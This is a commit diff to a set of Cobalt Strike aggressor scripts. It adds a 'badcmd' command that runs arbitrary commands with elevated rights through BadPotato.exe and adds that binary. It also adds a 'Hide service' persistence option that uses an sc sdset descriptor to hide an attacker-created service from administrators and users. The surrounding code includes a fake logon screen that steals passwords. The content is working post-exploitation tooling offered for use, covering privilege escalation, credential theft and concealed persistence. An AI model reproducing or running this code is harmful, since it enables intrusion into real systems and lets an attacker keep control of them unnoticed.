add badcmd

DeEpinGh0st · Oct 16, 2020 · 63b980d · 63b980d
1 parent 83e3254
commit 63b980d
Show file tree

Hide file tree

Showing 4 changed files with 64 additions and 38 deletions.
diff --git a/modules/commands.cna b/modules/commands.cna
@@ -57,4 +57,23 @@ alias logonscreen{
 beacon_command_register(
     "logonscreen",
     "pop a fake logonscreen to steal password",
-    "");
+    "");
+
+alias badcmd{
+    if($2 eq ""){
+        btask($1,"Usage: badcmd [command]");
+        return;
+    }
+    $args = "";
+    @args_list = sublist(@_, 1);
+    foreach $arg (@args_list){
+        $args .= $arg . " ";
+    }
+    $cmd = "\"".replace($args, "\"", "\\\"")."\"";
+    bexecute_assembly($1, script_resource("post/BadPotato.exe"), $cmd);
+}
+
+beacon_command_register(
+    "badcmd",
+    "execute command use badpotato",
+    "Usage: badcmd [command]");
diff --git a/modules/gather.cna b/modules/gather.cna
@@ -101,37 +101,37 @@ sub main{
     }
 }
 
-sub audit{
-    $bid = $1['@'];
-    $fname = beacon_info($bid,"computer")."-info.txt";
-    $lpath = script_resource("temp\\ $+ $fname");
-    $suggester = script_resource("local\\windows-exploit-suggester.py");
-    $db = script_resource("local\\2020-04-10-mssb.xls");
-    $audit_fname = script_resource("logs\\".beacon_info($bid,"computer")."-audit.txt");
-    bshell($bid,"systeminfo >  $+ $fname");
-    bdownload($bid, $fname);
-    #sleep(3 * 1000);
-    foreach %item (downloads()){
-            if (%item['name'] eq $fname){
-                $rpath = %item['lpath'];
-                sync_download($rpath, $lpath);
-            }
-        } 
-    #sleep(3 * 1000);
-    if (-exists $lpath){
-        $cmd = $suggester." -i  $+ $lpath  -d  $+ $db";
-        $process = exec("cmd.exe /c ".$cmd);
-        @data = readAll($process);
-        $out = openf(">" . $audit_fname); 
-        foreach $line (@data){
-            writeb($out, $line."\r\n");
-        }         
-        closef($out);
-        closef($process);
-        deleteFile(replace($fname, "\\\\", "/"));
-        exec("cmd.exe /c start ".script_resource("logs\\"));
-        }
-    }
+# sub audit{
+#     $bid = $1['@'];
+#     $fname = beacon_info($bid,"computer")."-info.txt";
+#     $lpath = script_resource("temp\\ $+ $fname");
+#     $suggester = script_resource("local\\windows-exploit-suggester.py");
+#     $db = script_resource("local\\2020-04-10-mssb.xls");
+#     $audit_fname = script_resource("logs\\".beacon_info($bid,"computer")."-audit.txt");
+#     bshell($bid,"systeminfo >  $+ $fname");
+#     bdownload($bid, $fname);
+#     #sleep(3 * 1000);
+#     foreach %item (downloads()){
+#             if (%item['name'] eq $fname){
+#                 $rpath = %item['lpath'];
+#                 sync_download($rpath, $lpath);
+#             }
+#         } 
+#     #sleep(3 * 1000);
+#     if (-exists $lpath){
+#         $cmd = $suggester." -i  $+ $lpath  -d  $+ $db";
+#         $process = exec("cmd.exe /c ".$cmd);
+#         @data = readAll($process);
+#         $out = openf(">" . $audit_fname); 
+#         foreach $line (@data){
+#             writeb($out, $line."\r\n");
+#         }         
+#         closef($out);
+#         closef($process);
+#         deleteFile(replace($fname, "\\\\", "/"));
+#         exec("cmd.exe /c start ".script_resource("logs\\"));
+#         }
+#     }
 
 
 #append menus
@@ -144,7 +144,7 @@ sub audit{
             dialog_description($dialog, "Collect information about the target host");
             drow_checkbox($dialog, "sysinfo", "System informations", "");
             drow_checkbox($dialog, "ipconfig", "Network card configuration information", "");
-            drow_checkbox($dialog, "netstat", "Listening port list", "");
+            drow_checkbox($dialog, "netstat", "Listening TCP port list", "");
             drow_checkbox($dialog, "software", "Installed software list", "");
             drow_checkbox($dialog, "ps_soft", "Installed software list(use powershell)", "");
             drow_checkbox($dialog, "runprocs", "Startup processes list", "");
@@ -163,7 +163,7 @@ sub audit{
             dialog_show($dialog);
         }
 
-        item "Audit available lpe vulnerability"{
-            audit($1);
-        }
+        # item "Audit available lpe vulnerability"{
+        #     audit($1);
+        # }
     }
diff --git a/modules/persistence.cna b/modules/persistence.cna
@@ -46,10 +46,16 @@ sub InstallSchedule{
 }
 
 sub InstallService{
-    local('$Name $Path');
+    local('$Name $Path $Hide_cmd');
     $Name = $3['SerName'];
     $Path = replace($3['Path'], "\"", "");
-    bshell($bid, "sc create \" $+ $Name\" binpath= \"cmd /c start \" $+ $Path\"\"&&sc config \" $+ $Name\" start= auto&&net start   $+ $Name");
+    $Hide_cmd = "sc sdset  $+  $Name \"D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)\"";
+    if ($3['Hide'] eq "true"){
+       bshell!($bid, "sc create \" $+ $Name\" binPath= \" $+ $Path\" && sc config \" $+ $Name\" start= auto &&  $+  $Hide_cmd");
+    }
+    else{
+        bshell!($bid, "sc create \" $+ $Name\" binPath= \" $+ $Path\" && sc config \" $+ $Name\" start= auto");
+    }
 }
 
 
@@ -100,6 +106,7 @@ sub InstallService{
                     dialog_description($Dialog, "Register an executable file as a service");
                     drow_text($Dialog, "SerName", "Service Name: ");
                     drow_text($Dialog, "Path", "Bin Path: ");
+                    drow_checkbox($Dialog, "Hide", "Hide service: ", "");
                     dbutton_action($Dialog, "Install");
                     dialog_show($Dialog);
                 }

diff --git a/post/BadPotato.exe b/post/BadPotato.exe